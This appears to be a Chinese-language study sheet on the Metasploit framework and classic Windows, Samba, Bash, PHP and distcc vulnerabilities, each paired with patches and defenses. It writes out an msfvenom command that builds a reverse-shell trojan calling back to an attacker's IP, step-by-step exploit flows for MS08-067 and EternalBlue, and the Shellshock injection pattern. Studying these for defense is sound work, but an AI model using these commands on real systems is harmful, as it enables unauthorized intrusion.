MSF框架+主流漏洞重点知识总结
一、MetasploitMSF核心基础1. 框架定位开源渗透测试一体化框架支持信息收集、漏洞探测、漏洞利用、后渗透、载荷生成内置数千漏洞模块Kali默认自带。2. 核心目录/usr/share/metasploit-framework/目录作用modules核心武器库分6大类模块auxiliary辅助端口扫描、弱口令爆破、漏洞探测exploits漏洞利用EXP触发漏洞拿权限payloads攻击载荷漏洞成功后执行的代码反弹shell、Meterpreterencoders编码免杀绕过杀毒/IDSpost后渗透抓密码、提权、内网横向移动data/scripts/tools字典、脚本、独立小工具3. 高频核心命令msfconsole启动MSF控制台search 漏洞名/CVE搜索对应漏洞模块例search ms08-067use 模块路径加载漏洞利用模块show options查看模块必填参数set RHOSTS IP设置目标IPset LHOST 本机IP反弹IPrun/exploit执行漏洞攻击sessions查看会话sessions -i 编号进入靶机会话back退出当前模块quit关闭MSFmsfvenom生成各类后门木马程序4. msfvenom木马生成作用生成反弹Shell木马靶机运行后主动连接攻击机。 示例Windows木马msfvenom -p windows/meterpreter/reverse_tcp LHOST攻击机IP LPORT端口 -f exe 木马.exe配套监听use exploit/multi/handler配置相同payload、端口后台监听。二、MS08-067 重点Windows经典SMB漏洞漏洞编号MS08-067CVE-2008-4250补丁KB958644原理Windows Server服务SMB445端口NetPathCanonicalize函数栈溢出畸形RPC路径无需账号密码远程执行代码直接获取SYSTEM最高权限影响系统Win2000/XP/Server2003Vista及以上默认受限MSF利用流程msfconsole search ms08-067 use exploit/windows/smb/ms08_067_netapi show options set RHOST 靶机IP run shell # 获取系统命令行危害Conficker震荡波蠕虫大规模内网传播防御打KB958644补丁、防火墙封禁445、关闭文件共享三、MS17-010永恒之蓝重点漏洞编号MS17-010NSA泄露WannaCry勒索病毒核心漏洞原理SMBv1协议FEALIST结构堆溢出内核级远程代码执行无交互攻击、支持蠕虫内网扩散影响系统XP/Vista/Win7/2003/2008等未打补丁WindowsMSF模块exploit/windows/smb/ms17_010_eternalblue防御安装KB4013389、彻底关闭SMBv1、外网拦截445端口四、其他经典漏洞核心要点1. MS10-018IE浏览器漏洞触发方式社工钓鱼目标访问恶意网页自动触发原理IE6/7 TDC ActiveX控件内存损坏UAF堆溢出MSF利用搭建攻击网页诱导靶机IE访问获取权限防御打KB980182、禁用危险ActiveX、开启DEP防护2. MS10-087Word RTF文档漏洞触发打开恶意RTF文档即触发无需启用宏原理Word解析RTF pFragments字段栈溢出利用MSF生成恶意rtf文件社工发送给目标防御KB2423930补丁、Office受保护视图、禁用RTF解析3. CVE-2017-7494SambaCryLinux永恒之蓝服务Linux Samba共享445端口原理管道名称路径校验缺陷上传恶意so库root执行条件存在可写共享目录、Samba 3.5.0~4.6.4未升级防御升级Samba、限制共享只读、防火墙拦截4454. CVE-2014-6271Shellshock破壳漏洞Bash环境变量函数解析漏洞CVSS满分10分利用载体Apache CGI、SSH ForceCommand、DHCP触发恶意() { :; }; 恶意命令环境变量注入防御升级Bash至4.3以上、Web过滤恶意请求头5. CVE-2012-1823PHP CGI参数注入场景PHP CGI运行模式原理URL参数被解析为PHP命令行参数注入恶意代码特征访问xxx.php?-s可直接泄露源码防御升级PHP、改用FPM、过滤URL特殊参数6. CVE-2004-2678Distcc远程命令执行服务分布式编译工具Distcc默认3632端口原理无IP访问限制编译参数命令注入直接执行系统指令防御限制客户端IP、非root运行distcc、关闭无用3632端口五、通用漏洞防御总结补丁修复所有漏洞最根本解决方案定期更新系统/组件补丁端口管控445SMB、3632等高危端口外网封禁内网IP白名单协议降级关闭老旧危险协议SMBv1权限最小化服务不以root/管理员权限运行流量防护防火墙、IDS拦截畸形SMB、恶意请求头社会工程防护不打开陌生文档、不点击未知钓鱼链接内存防护系统开启DEP、ASLR、CFG等内存保护机制六、重要区分MS08-067 vs MS17-010MS08-0672008SMBv1栈溢出用户层漏洞仅老XP/2003可用MS17-0102017SMBv1堆溢出内核漏洞全系列Windows勒索病毒主流载体
